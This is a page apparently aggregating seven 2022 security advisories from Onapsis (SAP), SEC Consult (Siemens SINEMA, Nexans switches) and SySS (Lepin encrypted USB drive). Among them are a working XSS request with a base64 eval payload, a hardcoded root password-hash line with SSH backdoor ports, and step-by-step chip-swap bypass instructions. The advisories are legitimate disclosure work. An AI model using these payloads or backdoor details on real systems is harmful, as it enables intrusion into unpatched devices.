Latest exploits :: CodePwn

<pre><code># Onapsis Security Advisory 2022-0007: Directory Traversal vulnerability in SAP Focused Run (Simple Diagnostics Agent 1.0) ## Impact on Business Exposing the contents of a directory can lead to a disclosure of useful information for the attacker to devise exploits, such as creation times of files or any information that may be encoded in file names. The directory listing may also compromise private or confidential data. ## Advisory Information - Public Release Date: 06/21/2022 - Security Advisory ID: ONAPSIS-2022-0007 - Researcher(s): Yvan Genuer ## Vulnerability Information - Vendor: SAP - Affected Components: - SIMPLE\_DIAGNOSTICS\_AGENT 1.0 (Check SAP Note 3159091 for detailed information on affected releases) - Vulnerability Class: CWE-548 - CVSS v3 score: 2.7 AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N - Risk Level: Low - Assigned CVE: CVE-2022-27657 - Vendor patch Information: SAP Security NOTE 3159091 ## Affected Components Description SAP Focused Run is a spin-off from SAP Solution Manager concentrating on the specific needs of high volume system and application monitoring, alerting and analytics needs. (https://support.sap.com/en/alm/sap-focused-run/expert-portal/) ## Vulnerability Details A path traversal exists in the Simple Diagnostic Agent service listening, by default, on localhost port 3005. A local attacker, without particular privileges, can use it to display content of the directory as ```sapadm``` OS user. Leading to information disclosure of potentially sensitive data. ## Solution SAP has released SAP Note 3159091 which provide patched versions of the affected components. The patches can be downloaded from https://launchpad.support.sap.com/#/notes/3159091. Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks. ## Report Timeline - 01/28/2022: Onapsis sends details to SAP - 02/02/2022: SAP provides internal ID - 04/12/2022: SAP releases SAP Note fixing the issue. - 06/21/2022: Advisory published ## References - Onapsis blogpost: https://onapsis.com/blog/sap-security-patch-day-april-2022-focus-spring4shell-an d-sap-mii - CVE Mitre: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27657 - Vendor Patch: https://launchpad.support.sap.com/#/notes/3159091 ## About Onapsis Research Labs Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. Find all reported vulnerabilities at https://github.com/Onapsis/vulnerability_advisories ## About Onapsis, Inc. Onapsis protects the mission-critical applications that run the global economy, from the core to the cloud. The Onapsis Platform uniquely delivers actionable insight, secure change, automated governance and continuous monitoring for critical systems—ERP, CRM, PLM, HCM, SCM and BI applications—from leading vendors such as SAP, Oracle, Salesforce and others, while keeping them protected and compliant. For more information, connect with us on Twitter or LinkedIn, or visit us at https://www.onapsis.com. -- This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited. </code></pre>

<pre><code># Onapsis Security Advisory 2022-0005: Cross-Site Scripting (XSS) vulnerability in SAP Fiori launchpad ## Impact on Business Impact depends on the victim's privileges. In most cases, a successful attack allows an attacker to hijack a session, or force the victim to perform undesired requests in the SAP System (CSRF) as well as redirected to arbitrary web site (Open Redirect). ## Advisory Information - Public Release Date: 06/21/2022 - Security Advisory ID: ONAPSIS-2022-0005 - Researcher(s): Yvan Genuer ## Vulnerability Information - Vendor: SAP - Affected Components: - SAP\_UI 753 - SAP\_UI 754 - SAP\_UI 755 - SAP\_UI 756 - SAP\_BASIS 787 (Check SAP Note 3149805 for detailed information on affected releases) - Vulnerability Class: CWE-79 - CVSS v3 score: 8.2 AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N - Risk Level: High - Assigned CVE: CVE-2022-26101 - Vendor patch Information: SAP Security NOTE 3149805 ## Affected Components Description SAP Fiori launchpad is the entry point to ABAP platform for SAP Fiori apps on mobile and desktop devices. ## Vulnerability Details During the navigation in SAP Fiori Launchpad, it is possible to provide a custom theme name using the url parameter ```sap-theme```. This parameter has an option to provide the path to a .css file, which it is used directly in the page generation. This optional input is not sufficiently sanitized, allowing an attacker to control and craft any kind of html payload in the page requested. ## Solution SAP has released SAP Note 3149805 which provide patched versions of the affected components. The patches can be downloaded from https://launchpad.support.sap.com/#/notes/3149805. Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks. ## Report Timeline - 01/28/2022: Onapsis sends details to SAP - 02/09/2022: SAP provides internal ID - 03/08/2022: SAP releases SAP Note fixing the issue. - 06/21/2022: Advisory published ## References - Onapsis blogpost: https://onapsis.com/blog/sap-security-patch-day-march-2022-sap-focused-run-affec ted-several-vulnerabilities - CVE Mitre: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26101 - Vendor Patch: https://launchpad.support.sap.com/#/notes/3149805 - Vendor FAQ: https://launchpad.support.sap.com/#/notes/3157089 ## About Onapsis Research Labs Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. Find all reported vulnerabilities at https://github.com/Onapsis/vulnerability_advisories ## About Onapsis, Inc. Onapsis protects the mission-critical applications that run the global economy, from the core to the cloud. The Onapsis Platform uniquely delivers actionable insight, secure change, automated governance and continuous monitoring for critical systems—ERP, CRM, PLM, HCM, SCM and BI applications—from leading vendors such as SAP, Oracle, Salesforce and others, while keeping them protected and compliant. For more information, connect with us on Twitter or LinkedIn, or visit us at https://www.onapsis.com. -- This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited. </code></pre>

<pre><code># Onapsis Security Advisory 2022-0004: Missing Authentication check in SAP Focused Run (Simple Diagnostics Agent 1.0) ## Impact on Business Because the Simple Diagnostic Agent (SDA) handles several important configuration and critical credential information, a successful attack could lead to the control of the SDA, and therefore affect: * Integrity, by modifying the configuration. * Availability, by stopping the service. * Confidentiality and Scope changing, by decrypting all stored credentials. Then accessing the SAP Focused Run system as well as the SAP system managed by the SDA. ## Advisory Information - Public Release Date: 06/21/2022 - Security Advisory ID: ONAPSIS-2022-0004 - Researcher(s): Yvan Genuer ## Vulnerability Information - Vendor: SAP - Affected Components: - SIMPLE\_DIAGNOSTICS\_AGENT 1.0 (Check SAP Note 3145987 for detailed information on affected releases) - Vulnerability Class: CWE-306 - CVSS v3 score: 9.3 AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - Risk Level: Critical - Assigned CVE: CVE-2022-24396 - Vendor patch Information: SAP Security NOTE 3145987 ## Affected Components Description SAP Focused Run is a spin-off from SAP Solution Manager concentrating on the specific needs of high volume system and application monitoring, alerting and analytics needs. (https://support.sap.com/en/alm/sap-focused-run/expert-portal/) ## Vulnerability Details Vulnerability 1: No authentication is required to interact with the Simple Diagnostic Agent http service on port 3005 by default. Therefore, unauthenticated attackers will have full access to either administrative or other privileged functionalities. Leveraging this access, they would be able to read, modify or delete sensitive information and configurations with sapadm OS user privileges. Vulnerability 2: A path traversal exists in the Simple Diagnostic Agent service listening, by default, on localhost port 3005. A local attacker, without particular privileges, can abuse this flaw in order to display the content of any OS directory which ```sapadm``` has access to. Leading to information disclosure of potentially sensitive data. ## Solution SAP has released SAP Note 3145987 which provide patched versions of the affected components. The patches can be downloaded from https://launchpad.support.sap.com/#/notes/3145987. Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks. ## Report Timeline - 01/28/2022: Onapsis sends details to SAP - 02/02/2022: SAP provides internal ID - 03/08/2022: SAP releases SAP Note fixing the issue. - 06/21/2022: Advisory published. ## References - Onapsis blogpost: https://onapsis.com/blog/sap-security-patch-day-march-2022-sap-focused-run-affec ted-several-vulnerabilities - CVE Mitre: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24396 - Vendor Patch: https://launchpad.support.sap.com/#/notes/3145987 ## About Onapsis Research Labs Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. Find all reported vulnerabilities at https://github.com/Onapsis/vulnerability_advisories ## About Onapsis, Inc. Onapsis protects the mission-critical applications that run the global economy, from the core to the cloud. The Onapsis Platform uniquely delivers actionable insight, secure change, automated governance and continuous monitoring for critical systems—ERP, CRM, PLM, HCM, SCM and BI applications—from leading vendors such as SAP, Oracle, Salesforce and others, while keeping them protected and compliant. For more information, connect with us on Twitter or LinkedIn, or visit us at https://www.onapsis.com. -- This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited. </code></pre>

<pre><code># Onapsis Security Advisory 2022-0003: Cross-Site Scripting (XSS) vulnerability in SAP Focused Run (Real User Monitoring) ## Impact on Business Impact depends on the victim's privileges. In most cases, a successful attack allows an attacker to hijack a session, or force the victim to perform undesired request in SAP Focused Run. ## Advisory Information - Public Release Date: 06/21/2022 - Security Advisory ID: ONAPSIS-2022-0003 - Researcher(s): Yvan Genuer ## Vulnerability Information - Vendor: SAP - Affected Components: - FRUN 2.00 - FRUN 3.00 (Check SAP Note 3147283 for detailed information on affected releases) - Vulnerability Class: CWE-79 - CVSS v3 score: 5.4 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - Risk Level: Medium - Assigned CVE: CVE-2022-24399 - Vendor patch Information: SAP Security NOTE 3147283 ## Affected Components Description SAP Focused Run is a spin-off from SAP Solution Manager concentrating on the specific needs of high volume system and application monitoring, alerting and analytics needs. (https://support.sap.com/en/alm/sap-focused-run/expert-portal/) ## Vulnerability Details The SAP Focused Run REST service ```/sap/bc/rest/rumupload``` do not sufficiently sanitize an input in the multipart/form-data leading to Cross-Site Scripting (XSS) vulnerability from the error page generated. ## Solution SAP has released SAP Note 3147283 which provide patched versions of the affected components. The patches can be downloaded from https://launchpad.support.sap.com/#/notes/3147283. Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks. ## Report Timeline - 01/28/2022: Onapsis sends details to SAP - 02/02/2022: SAP provides internal ID - 03/08/2022: SAP releases SAP Note fixing the issue. - 06/21/2022: Advisory published. ## References - Onapsis blogpost: https://onapsis.com/blog/sap-security-patch-day-march-2022-sap-focused-run-affec ted-several-vulnerabilities - CVE Mitre: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24399 - Vendor Patch: https://launchpad.support.sap.com/#/notes/3147283 ## About Onapsis Research Labs Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. Find all reported vulnerabilities at https://github.com/Onapsis/vulnerability_advisories ## About Onapsis, Inc. Onapsis protects the mission-critical applications that run the global economy, from the core to the cloud. The Onapsis Platform uniquely delivers actionable insight, secure change, automated governance and continuous monitoring for critical systems—ERP, CRM, PLM, HCM, SCM and BI applications—from leading vendors such as SAP, Oracle, Salesforce and others, while keeping them protected and compliant. For more information, connect with us on Twitter or LinkedIn, or visit us at https://www.onapsis.com. -- This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited. </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220614-0 > ======================================================================= title: Reflected Cross Site Scripting product: SIEMENS-SINEMA Remote Connect vulnerable version: <=V3.0.1.0-01.01.00.02 fixed version: V3.1.0 CVE number: CVE-2022-29034 impact: medium homepage: https://siemens.com found: 2022-03-01 by: S. Robertz (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Siemens is a technology company focused on industry, infrastructure, transport, and healthcare. From more resource-efficient factories, resilient supply chains, and smarter buildings and grids, to cleaner and more comfortable transportation as well as advanced healthcare, we create technology with purpose adding real value for customers. By combining the real and the digital worlds, we empower our customers to transform their industries and markets, helping them to transform the everyday for billions of people." "SINEMA Remote Connect is the management platform for remote networks. It is a server application that enables the simple management of tunnel connections (VPN) between headquarters, service technicians, and installed machines or plants." Source: https://www.siemens.com Source: https://new.siemens.com/global/en/products/automation/industrial-communication/industrial-remote-communication/remote-networks/sinema-remote-connect-access-service.html Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. Vulnerability overview/description: ----------------------------------- 1) Reflected Cross Site Scripting (CVE-2022-29034) The application contains a reflected cross-site-scripting vulnerability that can be used to execute JavaScript code in the victim's browser. Proof of concept: ----------------- 1) Reflected Cross Site Scripting (CVE-2022-29034) The error occurs when setting the syslog server to an illegal IP address. An error message will pop up and will reflect the supplied IP address. However, the popup message does not use the proper JQuery method, and thus allows to inject JavaScript code. Note that dots can not be used in the JavaScript payload, as they will get filtered by the IP parser that runs beforehand. This was circumvented by supplying the JavaScript code in base64. Following request can be used to trigger the XSS: POST /services/syslog_client_settings HTTP/1.1 Host: $host Cookie: sessionid=708xmctjzk39og596jp4q4r1udfom4l5; csrftoken=sP8NzwJozla1k18xrRzsXiY0zq16IyBddtlDA1C5BC1Orf0oGcqUPr2bpUv1VGLu Content-Length: 153 X-Requested-With: XMLHttpRequest X-Csrftoken: U5AQMbPh3JTcdfdBkgIvaLtoitpS7jUVFJNGNGIY50KZkt5szBzX2Uxz8XTNkr4c Referer: https://$host/services/syslog_client_settings Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close address=127.0.0.1.<script>eval(atob("YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="))</script>&port=1234&pr otocol=tcp&client_authentication=false&certificate=62&mode= Vulnerable / tested versions: ----------------------------- The following version has been tested and found to be vulnerable: * V3.0.1.0-01.01.00.02 Vendor contact timeline: ------------------------ 2022-04-01: Sending advisory via productcert@siemens.com 2022-04-01: Issue tracked by Siemens under case #29947 2022-04-19: Siemens confirms vulnerability. Patch available mid May. Coordinated advisory release date for 2022-06-14. 2022-06-07: Asking for fixed versions & CVE numbers. 2022-06-14: Coordinated advisory release. Solution: --------- Version V3.1.0 fixes our identified issues as well as other security vulnerabilities according to the vendor. The firmware can be downloaded here: https://support.industry.siemens.com/cs/ww/en/view/109811169/ The vendor published a security advisory as well: https://cert-portal.siemens.com/productcert/html/ssa-484086.html Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF S. Robertz / @2022 </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220615-0 > ======================================================================= title: Hardcoded Backdoor User and Outdated Software Components product: Nexans FTTO GigaSwitch industrial/office switches HW version 5 vulnerable version: See "Vulnerable / tested versions" fixed version: V6.02N, V7.02 CVE number: CVE-2022-32985 impact: High homepage: https://www.nexans.com/ found: 2020-05-25 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "As a global player in the cable industry, Nexans is behind the scenes delivering the innovative services and resilient products that carry thousands of watts of energy and terabytes of data per second around the world. Millions of homes, cities, businesses are powered every day by Nexans’ high-quality sustainable cabling solutions. We help our customers meet the challenges they face in the fields of energy infrastructure, energy resources, transport, buildings, telecom and data, providing them with solutions and services for the most complex cable applications in the most demanding environments." Source: https://www.nexans.com/company/What-we-do.html Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. SEC Consult recommends to perform a thorough security review of these products conducted by security professionals to identify and resolve all security issues. Vulnerability overview/description: ----------------------------------- 1) Outdated Vulnerable Software Components A static scan with the IoT Inspector (ONEKEY) revealed outdated software packages that are used in the devices' firmware. Four of them were verified by using the MEDUSA scalable firmware runtime. 2) Hardcoded Backdoor User (CVE-2022-32985) A hardcoded root user was found in "/etc/passwd". In combination with the invoked dropbear SSH daemon in the libnx_apl.so library, it can be used on port 50201 and 50200 to login on a system shell. Proof of concept: ----------------- 1) Outdated Vulnerable Software Components Based on an automated scan with the IoT Inspector (ONEKEY) the following third party software packages were found to be outdated: Firmware version 6.02L: BusyBox 1.20.2 Dropbear SSH 2012.55 GNU glibc 2.17 lighttpd 1.4.48 OpenSSL 1.0.2h The following CVEs were verified with MEDUSA scalable firmware emulation: * CVE-2015-9261 (Unzip) The crafted ZIP archive "x_6170921383890712452.bin" was taken from: https://www.openwall.com/lists/oss-security/2015/10/25/3 Execution inside the firmware emulation: bash-4.2# unzip x_6170921383890712452.bin Archive: x_6170921383890712452.bin inflating: ]3j½r«IK-%Ix do_page_fault(): sending SIGSEGV to unzip for invalid read access from 735ededc epc = 0044bb28 in busybox[400000+99000] ra = 0044b968 in busybox[400000+99000] Segmentation fault * CVE-2015-0235 (gethostbyname "GHOST" buffer overflow) PoC code was taken from: https://gist.github.com/dweinstein/66e6a088191ac0e8105c * CVE-2015-7547 (getaddrinfo buffer overflow) PoC code was taken from: https://github.com/fjserna/CVE-2015-7547 -bash-4.4# python /medusa_exploits/cve-2015-7547-poc.py & [1] 259 -bash-4.4# chroot /medusa_rootfs/ bin/bash bash-4.2# cd /medusa_exploits/ bash-4.2# ./cve-2015-7547_glibc_getaddrinfo [UDP] Total Data len recv 36 [UDP] Total Data len recv 36 Connected with 127.0.0.1:34356 [TCP] Total Data len recv 76 [TCP] Request1 len recv 36 [TCP] Request2 len recv 36 Segmentation fault * CVE-2017-16544 (shell autocompletion vulnerability) A file with the name "\ectest\n\e]55;test.txt\a" was created to trigger the vulnerability. ------------------------------------------------------------------------------- # ls "pressing <TAB>" test ]55;test.txt # ------------------------------------------------------------------------------- 2) Hardcoded Backdoor User (CVE-2022-32985) The hardcoded system user, reachable via the dropbear SSH daemon was found due to multiple indications on the system. The undocumented root user itself was contained in the "passwd" file: Content of the file "/etc/passwd". ------------------------------------------------------------------------------- root:oFQzvQf5qrI56:0:0:root:/home/root:/bin/sh [...] ------------------------------------------------------------------------------- A suspicious port for the SSH daemon was chosen in the config file of dropbear: Content of the file "/etc/init.d/dropbear": ------------------------------------------------------------------------------- PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin DAEMON=/usr/sbin/dropbear NAME=dropbear DESC="Dropbear SSH server" PIDFILE=/var/run/dropbear.pid DROPBEAR_PORT="50200 -p 50201" [...] ------------------------------------------------------------------------------- This is invoked from "/usr/lib/libnx_apl.so.0.0.0", which can be seen in the following pseudo-code: ------------------------------------------------------------------------------- void dropbear_server_init(char param_1) { __pid_t __pid; char *pcVar1; int aiStack16 [2]; __pid = fork(); if (__pid == 0) { __pid = fork(); if (__pid != 0) { /* WARNING: Subroutine does not return */ exit(0); } if (param_1 == '\0') { pcVar1 = "/etc/init.d/dropbear stop"; } else { pcVar1 = "/etc/init.d/dropbear start"; <--- } execl("/bin/sh","sh",&DAT_2cd91564,pcVar1,0); } else { waitpid(__pid,aiStack16,0); } return; } ------------------------------------------------------------------------------- This function is called if a specific command is issued in the CLI interface: ------------------------------------------------------------------------------- [...] iVar6 = telnet_cmp_command((char *)(param_3 + 0xf2),"ssh",2); if (iVar6 != 0) { if (param_2 < 4) { netbuf_fwd_sprintf(param_1,"\r\n%%Error: Parameter missing\r\n"); iVar6 = shared_mem_get_addr(&var_shm); iVar7 = shared_mem_get_addr(&var_shm); uVar8 = shared_mem_read_u8(&var_shm,iVar7 + 0x161a); shared_mem_write_u8(&var_shm,iVar6 + 0x161a,uVar8 & 0xff | 0x10); return; } iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),"start",1); if (iVar6 != 0) { dropbear_server_init('\x01'); <--- netbuf_fwd_sprintf(param_1,"Starting dropbear...\r\n"); return; } iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),"stop",1); if (iVar6 != 0) { dropbear_server_init('\0'); <--- netbuf_fwd_sprintf(param_1,"Stopping dropbear...\r\n"); return; } netbuf_fwd_sprintf(param_1,"Uknown dropbear command...\r\n"); return; [...] ------------------------------------------------------------------------------- The mentioned library is used in the CLI program that is running on the device. Vulnerable / tested versions: ----------------------------- The following firmware versions have been tested: * Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 6.02L * Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 5.04M Vendor contact timeline: ------------------------ 2020-05-28: Contacting the vendor's PSIRT under the following link: http://www.nexans-ans.de/support/index.php?u=security_portal_sendmail No answer. 2020-06-08: Contacting vendor again via support.ans@nexans.com. Extended deadline by 11 days. 2020-06-16: Telephone call with Nexans representative. Security advisory was received. It will be reviewed to confirm the found issues. 2020-06-26: Telephone call with Nexans representative. Nexans is working on the reported issues and will remove the dropbear daemon as first measure. 2020-08-04: Vendor stated that a fix for the outdated software components will be available in November. 2020-11-12: Asked for status update. 2020-11-16: Contact stated, that firmware test will need more time. Updates are estimated to be ready in Q1 of 2020. 2020-11-20: Vendor confirmed Q1 as estimated disclosure date. 2021-01-21: Asked for status update; Vendor stated that the release with all fixes is aimed to be published end of Q1. 2021-03-09: Asked for status update. 2021-03-17: Vendor stated that the firmware is in testing stage. The fixed firmware will be released in May. 2021-06-10: Asked for status update. 2021-06-14: Vendor stated that the firmware is not ready due to COVID19 and homeschooling. The fixed firmware will be released end of August. 2021-08-31: Asked for status update. 2021-09-07: Vendor stated that the fixed firmware will be ready end of 2021. 2022-05-23: Informed vendor that the advisory will be released mid of June 2022. 2022-05-24: Firmware V7.02 is available for download which fixes most outdated components issues. 2022-06-15: Release of security advisory. Solution: --------- The vendor provides an updated firmware here: https://www.nexans-ans.de/support/firmware/ Firmware version V6.02N has the backdoor removed and was already published a while ago. Version V7.02 also has the backdoor removed and most of the outdated software issues. Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF T. Weber / @2022 </code></pre>

<pre><code>Advisory ID: SYSS-2022-024 Product: EP-KP001 Manufacturer: Lepin Affected Version(s): KP001_V19 Tested Version(s): KP001_V19 Vulnerability Type: Violation of Secure Design Principles (CWE-657) Risk Level: High Solution Status: Open Manufacturer Notification: 2022-04-12 Solution Date: - Public Disclosure: 2022-06-10 CVE Reference: CVE-2022-29948 Author of Advisory: Matthias Deeg (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The Lepin EP-KP001 is a USB flash drive with AES-256 hardware encryption and a built-in keypad for passcode entry. The manufacturer describes the product as follows (see [1]): "[Safeguard Your Sensitive DATA] With Military Grade Full-disk 256-bit AES XTS Hardware Encryption to protect your important files. All your data is protected by hardware encryption, so no one can access your data without knowing the password." Due to an insecure design, the Lepin EP-KP001 flash drive is vulnerable to an authentication bypass attack which enables an attacker to gain unauthorized access to the stored encrypted data. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: When analyzing the USB flash drive Lepin EP-KP001, Matthias Deeg found out that it uses an insecure hardware design which allows an attacker to bypass the password-based user authentication. The Lepin EP-KP001 consists of the following four main parts: 1. An unknown NAND flash memory chip 2. An Alcor Micro flash disk controller (AU6989SNBL-GTD) 3. An unknown microcontroller (unkmarked chip) used as keypad controller 4. A high-speed analog switch (SGM7222) The encrypted disk partition with the stored user data can be unlocked by entering the correct passcode via the keypad and pressing the "unlock" button. Due to the performed analysis, the password-based user authentication via a passcode comprised of 6 to 14 digits is performed by the unknown microcontroller. By replacing this unknown microcontroller on a target device with one from an attacker-controlled Lepin EP-KP001 whose passcode was known, it was possible to successfully unlock the targeted Lepin EP-KP001 USB flash drive and to gain unauthorized access to the stored data in cleartext. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): A successful authentication bypass attack could be performed via the following steps: 1. Set a passcode on an attacker-controlled Lepin EP-KP001. 2. Desolder the unmarked microcontroller from the attacker-controlled device. 3. Desolder the unmarked microcontroller from the targeted Lepin EP-KP001. 4. Solder the unmarked microcontroller from the attacker-controlled device on the targeted device. 5. Unlock the targeted device with the initially set and known passcode. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: SySS is not aware of a security fix for the described security issue. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-04-12: Vulnerability reported to manufacturer 2022-06-10: Public release of security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Lepin EP-KP001 https://www.amazon.com/Encrypted-Password-Aluminum-Portable-Protected/dp/B06W5H9GP7/ [2] SySS Security Advisory SYSS-2022-024 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-024.txt [4] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en </code></pre>

